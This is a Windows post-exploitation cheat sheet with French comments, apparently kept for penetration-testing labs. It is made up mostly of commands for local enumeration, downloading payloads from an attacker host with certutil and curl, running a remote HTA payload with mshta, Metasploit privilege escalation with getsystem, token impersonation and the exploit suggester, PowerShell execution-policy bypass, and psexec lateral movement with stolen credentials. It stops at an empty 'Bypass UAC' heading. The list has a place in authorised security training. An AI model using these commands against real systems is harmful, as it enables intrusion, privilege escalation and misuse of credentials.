Checklist

1- Local Enumeration

cmd> hostname #nom de la VM
cmd> systeminfo #infos systemes windows
cmd> wmic qfe get Caption,Description,HotFixId,InstalledOn
#list Hotfixes by date
PS> Get-HotFix | Select-Object Caption, Description, HotFixId, InstalledOn
#idem mais en PS

meterpreter> show_mount
meterpreter> use post/windows/gather/checkvm
meterpreter> use post/windows/gather/enum_applications
meterpreter> use post/windows/gather/enum_computers
meterpreter> use post/windows/gather/enum_patches
meterpreter> getuid #info sur le user
meterpreter> getprivs #liste privileges du user
msf> use post/windows/gather/win_privs #privileges du user
msf> use post/windows/gather/enum_logged_on_users #user enumeration via metasploit
cmd> whoami /priv #liste privilèges
cmd> net users #liste tous les users
cmd> net user <username>
cmd> net localgroup #liste des groupes locaux
cmd> net localgroup administrators #liste le groupe admin local

cmd> ipconfig
cmd> route print #routing table
cmd> arp -a #table arp
cmd> netstat -ano #listening ports
cmd> netsh advfirewall <command> #listing config Firewall
cmd> schtasks /query /fo LIST  #scheduled tasks
cmd> type c:\\Windows\\System32\\Drivers\\etc\\hosts
meterpreter> ps
meterpreter> pgrep <process-name>
#shell
cmd> net start #list of started services
cmd> wmic service list brief #list of services
cmd> tasklist /SVC #list of current processes + link to services 

#JAWS
https://github.com/411Hall/JAWS

CMD C:\\temp> powershell.exe -ExecutionPolicy Bypass -File .\\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

2- File Transfer

python -m http.server 80 #python3 web server on Attacker
python -m SimpleHTTPServer 80 #python2

certutil -urlcache -f http://<attacker_IP>/<filename> payload.exe 
#download from Windows target
curl -o payload.exe http://<attacker_IP>/<filename>
# si curl installé

3- Upgrade shells

https://zweilosec.github.io/posts/upgrade-windows-shell/
- socat
- rlwrap
- meterpreter

#payload with HTA app (metasploit)
msf> use exploit/windows/misc/hta_server
# copy payload link and launch on victim
cmd> mshta.exe <http://10.10.0.2:8080/6Nz7aySfPN.hta>

4- PrivEsc

https://github.com/itm4n/PrivescCheck

#metasploit suggester
meterpreter> run post/multi/recon/local_exploit_suggester

#via metasploit
meterpreter> getsystem
meterpreter> migrate <pid>

#Token impersonation
meterpreter> load incognito
meterpreter> list_tokens -u
impersonate_token ATTACKDEFENSE\\\\Administrator

#Powershell sur victim via PrivEsc
cmd> powershell -ep bypass -c ". .\\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT"

#ou bien "load powershell" sur meterpreter puis
meterpreter> powershell_shell
PS> . .\\PowerUp.ps1
PS> Invoke-AllChecks

#une fois les credentials obtenus (hash ou clear pwd)
msf> use exploit/windows/smb/psexec #via msf

psexec.py Administrator@<Target_IP> #via script python sur attacker

runas.exe /user:administrator cmd #sur cible windows 'se connecter en tant que'

Bypass UAC